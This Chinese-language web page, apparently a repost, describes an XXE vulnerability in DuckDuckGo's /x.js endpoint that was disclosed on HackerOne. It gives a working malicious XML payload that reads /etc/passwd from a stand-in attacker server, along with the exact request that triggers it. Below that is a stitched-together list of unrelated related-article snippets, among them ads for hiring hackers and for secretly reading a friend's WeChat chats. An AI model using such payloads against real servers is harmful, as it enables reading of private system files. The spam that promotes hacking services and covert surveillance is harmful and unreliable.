DuckDuckGo搜索引擎的XXE漏洞

访客4年前黑客工具530

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。


DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。


漏洞详情


漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。


只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。


而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。


具体步骤如下


1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。


<?xm l version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>


2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml


3.返回的页面可以看到xm l文件解析结果


DuckDuckGo搜索引擎的XXE漏洞

相关文章

北京滑雪场门票多少钱一张(什么时候开业,营

北京滑雪场门票多少钱一张(什么时候开业,营

      可以做的事情太多了!不过,滑冰还早,北京现在的冰面刚刚冻上,还不结实,但我们可以去滑雪啊!在皑皑的雪山上,享受一番风驰电掣的快感,这才是这个冬天最合适的状态! 那个广告怎么说来...

因为赌博输了,把房子签了一个卖房协议给人家了!

攻击方式二:Kerberos委派 Windows Server 2003 x64 版本 SP2 Windows Server 2008 for x64-based Systems Service Pa...

微商代理和微商代理平台有什么区别

微商代理和微商代理平台有什么区别

对于微商很多人还不是很了解,今天把几种微商形式做一个解析,对于想要参与的人能起到一个参考的作用,以免误入歧途。 什么是代理式微商? 微商本质是生意,做生意就是需要进货,只不过生意大小,无论你是...

傻子瓜子零食加盟品牌优势是什么?一起来看看吧

傻子瓜子零食加盟品牌优势是什么?一起来看看吧

现如今越来越多的人都想要通过加盟创业的方法来实现本身的人生抱负,可是面临市场上浩瀚的加盟项目,一时间不知道该如何举办选择,此刻我来为各人推荐一下傻子瓜子零食加盟项目,该品牌创立多年,品牌形象早就已经深...

黑客必用的专业QQ工具,网络上网站输钱找黑客,黑客能否攻击更改网站数据

FireEye将b.exe(MD5:9fff498b78d9498b33e08b892148135f)标识为VALUEVAULT。 一、前语恳求针对各类安卓设备,Androi...

偷偷查看闺蜜全部的微信聊天记录

<-- --> 刚出生的新生儿在这段时间是非常脆弱的,而且也是非常容易感冒的。那么新生儿感冒鼻塞了该怎么办呢,可喝姜水吗。下面小编就来给大家说一说。 新生儿鼻塞可以喝姜水吗 新生儿鼻...